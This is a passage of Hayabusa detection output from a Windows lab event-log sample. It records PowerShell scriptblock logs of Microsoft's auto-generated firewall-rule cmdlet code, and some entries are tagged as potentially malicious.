[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and 
(@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } 
if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdlet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 
($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and 